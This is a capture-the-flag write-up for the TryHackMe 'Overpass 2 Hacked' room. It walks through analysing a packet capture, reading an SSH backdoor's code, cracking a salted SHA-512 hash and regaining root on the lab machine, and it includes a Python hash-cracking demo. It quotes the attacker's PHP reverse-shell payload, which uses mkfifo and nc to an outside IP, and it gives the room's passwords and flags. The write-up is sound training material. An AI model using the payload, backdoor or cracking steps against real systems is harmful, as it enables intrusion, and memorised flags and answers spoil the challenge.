THM Overpass 2 Hacked - grunt92/IT-Sec-WriteUps GitHub Wiki

Forensics - Analyse the PCAP

What was the url of the page they used to upload the reverse shell

Download the asset and open it in Wireshark. In Wireshark you can look for uploads with the display filter http.request.method == "POST", assuming that HTTP was used for the upload. After applying this filter you get a single entry. Right-click on the entry and choose Follow > HTTP Stream. The first line of the stream contains the answer.

development

What payload did the attacker use to gain access?

In the same window, scroll down until you find an entry that mentions a parameter name="fileToUpload". Examine this section and you can see the specific content of that file.

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

What password did the attacker use to privesc?

To complete this task you can use the payload to follow the reverse shell. To do so set the filter to tcp.port == 4242 && ip.dst == 192.168.170.145, follow the TCP stream of the first entry and you can find the password parameter including its value.

whenevernoteartinstant

How did the attacker establish persistence?

In the same stream, scroll down and you will find a command run by the attacker that clones the ssh-backdoor repository by NinjaJc01.

https://github.com/NinjaJc01/ssh-backdoor

Using the fasttrack wordlist, how many of the system passwords were crackable?

Copy the content of the "shadow" file, save it to a file (here named passwords) and run john --wordlist=/usr/share/wordlists/fasttrack.txt passwords to crack the passwords yourself.

4

Research - Analyse the code

What's the default hash for the backdoor?

Go to https://github.com/NinjaJc01/ssh-backdoor. Select the main.go file and look for the hash variable. Copy the value and you have the answer.

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

What's the hardcoded salt for the backdoor?

Scroll through the code and you will find a function called "verifyPass". This function takes a salt parameter. Scroll to the end of the file and you find a function called "passwordHandler" that calls "verifyPass" with a hard-coded salt value:

1c362db832f3f864c8c2fe05f2002a05

What was the hash that the attacker used? - go back to the PCAP for this!

Go back to the Wireshark window and scroll down to the bottom of the stream. At the end the attacker ran "./backdoor -a" with a different hash.

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Crack the hash using rockyou and a cracking tool of your choice. What's the password?

By looking at the source code we can find out that the password is salted by appending the salt to it, and we also know the salt from the previous task. Combine the hash and the salt separated by ":" in a file. Running hashid on the hash itself shows that it is probably SHA-512. The hashcat mode for sha512($pass.$salt) is 1710, so running hashcat -m 1710 hash /usr/share/wordlists/rockyou.txt --force gives the password.

november16
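The following Python snippet is an added example and not part of this writeup or the backdoor project. It reproduces the hashing scheme the task relies on (sha512 of password followed by salt, which is what hashcat mode 1710 computes) using the salt found above, and runs a tiny constructed wordlist against a constructed target so you can confirm the concatenation order before spending time on rockyou.

```python
import hashlib
from typing import Iterable, Optional

# Salt hard-coded in the backdoor's passwordHandler (value taken from the writeup above)
SALT = "1c362db832f3f864c8c2fe05f2002a05"


def backdoor_hash(password: str, salt: str = SALT) -> str:
    """sha512(password + salt), hex encoded: the scheme hashcat calls mode 1710."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def wrong_order_hash(password: str, salt: str = SALT) -> str:
    """sha512(salt + password): hashcat mode 1720. Used to show that salt order matters."""
    return hashlib.sha512((salt + password).encode()).hexdigest()


def hashcat_line(hash_hex: str, salt: str) -> str:
    """Format a target the way hashcat -m 1710 expects it: hash:salt."""
    return f"{hash_hex}:{salt}"


def crack(target_hex: str, salt: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try every candidate from wordlist; return the matching password or None."""
    target = target_hex.strip().lower()
    for word in wordlist:
        word = word.rstrip("\n")
        if backdoor_hash(word, salt) == target:
            return word
    return None


# Constructed stand-in for rockyou.txt; DEMO_PASSWORD is a made-up value, not the room's answer
WORDLIST = ["password", "letmein", "summer2020", "correcthorse"]
DEMO_PASSWORD = "summer2020"
DEMO_HASH = backdoor_hash(DEMO_PASSWORD)


def demo() -> Optional[str]:
    """Cracks the constructed target; returns 'summer2020'."""
    return crack(DEMO_HASH, SALT, WORDLIST)


if __name__ == "__main__":
    print("hashcat input line:", hashcat_line(DEMO_HASH, SALT))
    print("recovered password:", demo())
    # The same hash built with salt first is not found: wrong mode, no result
    print("salt-first lookup:", crack(wrong_order_hash(DEMO_PASSWORD), SALT, WORDLIST))
```

Feeding the real hash and salt from the two tasks above into crack() with rockyou as the wordlist is the same computation hashcat -m 1710 performs, just much slower.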

Attack - Get back in!

The attacker defaced the website. What message did they leave as a heading?

Deploy the machine and enter its IP into a web browser; the heading is shown on the defaced page.

H4ck3d by CooctusClan

Using the information you've found previously, hack your way back in!

To log in you have to use SSH. If you try to connect using the standard port you may have an issue. If you run nmap -A -p- IP you will find that SSH is also listening on port 2222. Connect to that service using ssh james@IP -p 2222 and enter the password we got by cracking the hash in the last task (november16).

No answer needed

What's the user flag?

After establishing the SSH connection you can get the flag by running cat ../user.txt.

thm{d119b4fa8c497ddb0525f7ad200e6567}

What's the root flag?

Move to the "/home/james" directory and run ls -la; you will see a file named ".suid_bash". Run it with ./.suid_bash -p to become root. After this you can run cat /root/root.txt to get the flag.

thm{d53b2684f169360bb9606c333873144d}